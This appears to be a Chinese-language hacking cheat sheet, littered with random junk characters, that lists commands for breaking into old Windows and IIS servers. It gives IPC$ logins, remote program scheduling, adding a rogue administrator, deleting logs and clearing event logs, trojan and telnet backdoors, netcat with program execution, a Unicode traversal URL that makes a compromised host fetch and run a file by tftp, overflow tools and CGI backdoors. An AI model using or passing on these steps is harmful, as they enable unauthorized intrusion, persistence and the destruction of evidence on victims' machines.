网管和黑客都必须知道的命令
J#..xJ?XRD 常用的几条NET命令:
0SL{J*S4[# S[F06.(1 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
+]%S}<R Y6v{eWtSn (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
rRq60A cX-M9Cz (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
",b:rgpRp g0grfGo2p (查看远程主机时间) net time \\IP地址
]W5*R07 h-P|O6@Ki (定时启动某个程序) at \\IP地址 02:18 readme.exe
a!$kKOK }Z"iW/?" (查看共享) net view \\IP地址
f)*"X[)o \1<'XVS (查看netbios工作组列表) nbtstat -A IP地址
"0CFvN'4 J9mK9{#q (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
V9oBSP'kt z+"$G (这两条把自己增加到管理员组): net user 用户名 密码 /add
y&$n[j z By%=)` net localgroup Administrators 用户名 /add
w jkh*Y D^6*Cwb (断开连接) net use \\IP地址\ipc$ /delete
a4,V(Hlm &ys>z<Z
扫尾:
Ljy797{f y*iZ;Bv j del C:\winnt\system32\logfiles\*.*
/whaY4__O\ =?OU^u`C del C:\winnt\ssytem32\config\*.evt
}n9(|i+ Ms!EK del C:\winnt\system32\dtclog\*.*
40kAGs>_ i6if\B del C:\winnt\system32\*.log
G)7U&B 60+ zoL' del C:\winnt\system32\*.txt
6^b)Q(Edut 64/ZfXD del C:\winnt\*.txt
*O_fw 0jV *$eH3nn6g del C:\winnt\*.log
O)dnr8* uuY^Q;^I* 一、netsvc.exe
CQWXLQED> DsHF9Mn 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
D]@(LbMG4 b9j}QK netsvc /list \\IP地址
'##?PQ*u A^OwT#
netsvc schedule \\IP地址 /query
At.&$ t mo| D netsvc \\IP地址 schedule /start
5T;LWS ahl|N` 二、OpenTelnet.exe
gnp.!- t=P+m 远程启动主机的Telnet服务,并绑定端口到7878,例如:
c-$rB_t+ \}b2oiY OpenTelnet \\IP地址 用户名 密码 1 7878
=z# trQ{ 9+1{a.JO 然后就可以telnet到主机的7878端口,进入DOS方式下:
:=NXwY3~M ^)dsi telnet IP地址 7878
CPJ<A,V doanTF4Da 三、winshell.exe
|=}+%>y_ &ivU4rEG 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
>#G%2Vp OWvblEBF p Path (查看winshell主程序的路径信息)
^?lpY{aa KTm^}')C8 b reBoot (重新启动机器)
Cv,WG]E7( P'<i3#;7X d shutDown (关闭机器)
bbC@ |xB`cSu( s Shell (执行后你就会看到可爱的“C:\>”)
S F)$b @8W@I| x eXit (退出本次登录会话,此命令并不终止winshell的运行)
#&|"t<} H:(B^uH CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
M1Q&)am |P5dv>tb
F 四、3389登陆器,GUI方式登录远程主机的
Oa/^A-'Q *Dg@fxCQ 五、elsave.exe
Wg}KQ6
6 >|SIqB<%: 事件日志清除工具
-m`|S q Km5_P## elsave -s \\IP地址 -l "application" -C
Gld~GyB\k @)b'3~D elsave -s \\IP地址 -l "system" -C
ko}& X= ;<FAcR elsave -s \\IP地址 -l "security" -C
%j&vV>2 c^W;p2^ 执行后成功清除应用程序日志,系统日志,安全日志
q-z1ElrN7u ?AFb& 六、hbulot.exe
}U7IMONU b~.$1oZ 开启win2kserver和winxp的3389服务
)9 Q+07 ,kJ'_mq hbulot [/r]
M ygCg(h Gpu[<Z4 使用/r表示安装完成后自动重起目标使设置生效。
s,_+5ukv K28L(4 ) 七、nc.exe(netcat.exe)
%B@NW2ZQ[ P`Zon 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
u$JAjA "Da1BuX\ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
kQ=bd{a6 E]#;K-j 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
]G[ "TX, g]f<k2 参数:
29:2Xu i sPK ]:iC -e prog 程序重定向,一旦连接,就执行 [危险!!]
1sXCu|\q "==c -g gateway source-routing hop point[s], up to 8
"W5MZ |)7K(R)(= -G num source-routing pointer: 4, 8, 12, ...
`he# !" Z. ${WZW -h 帮助信息
W1)SgiXnuy 0Jv6?7]LKa -i secs 延时的间隔
WoXAOj%iW 9'(_*KSH -l 监听模式,用于入站连接
}d5]N 0eO!,/ -n 指定数字的IP地址,不能用hostname
$PMr)U n~0wq(8M -o file 记录16进制的传输
/>xEpR3_A a@? $#> -p port 本地端口号
F.TIdkvp 8fQ~UcT$ -r 任意指定本地及远程端口
S*Ea" vBA 2[B bdg[O -s addr 本地源地址
,i*rHMe `)O9
'568 -u UDP模式
`6rLd>=R 0/~p1SSun -v 详细输出——用两个-v可得到更详细的内容
[
&Wy $ Y's=31G@ -w secs timeout的时间
TY]0aw2]|7 <x`yoVPiZg -z 将输入输出关掉——用于扫描时
E:rJi] 八、TFTPD32.EXE
S[y'{; m !:F/?B 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
(lwV(M `
,T. http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
b#7nt ?`7p (B` NnL$ 然后可以直接令文件运行:
$U,]c (B\Kb4m http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
y1 a%f.F` zDYJe_m ~ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
=F[M>o !wAnsK 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
>XZ2w_ 2\{/|\ 一、一 Xscan命令行运行参数说明:
]9@4P$I Rs<S}oeLn 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
qo9&e~Y<G x6>WvFZ 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
4 4QW&qL!( bHTf{= xscan -file <主机列表文件名> <检测项目> [其他选项]
]>)}xfL &, u9;3Xn8 其中<检测项目> 含义如下:
0uKm)t/ a/E(GQ,, -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
CV|Ae [ ~a=]w#-KD -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
AYNz {9 p!DdX -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
~RLjL" pe[huYE -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
{{A=^rr%C nkq{_;xp -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
v2|zIZ }!g$k
$y [其他选项] 含义如下:
4-O.i\1q VIWH~UR)&! -v: 显示详细扫描进度
mmFcch$Jv )cN=/i -p: 跳过Ping不通的主机
1
=?pL$+G d>M 0: -o: 跳过没有检测到开放端口的主机
XPYf1H
H|s Iw: -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10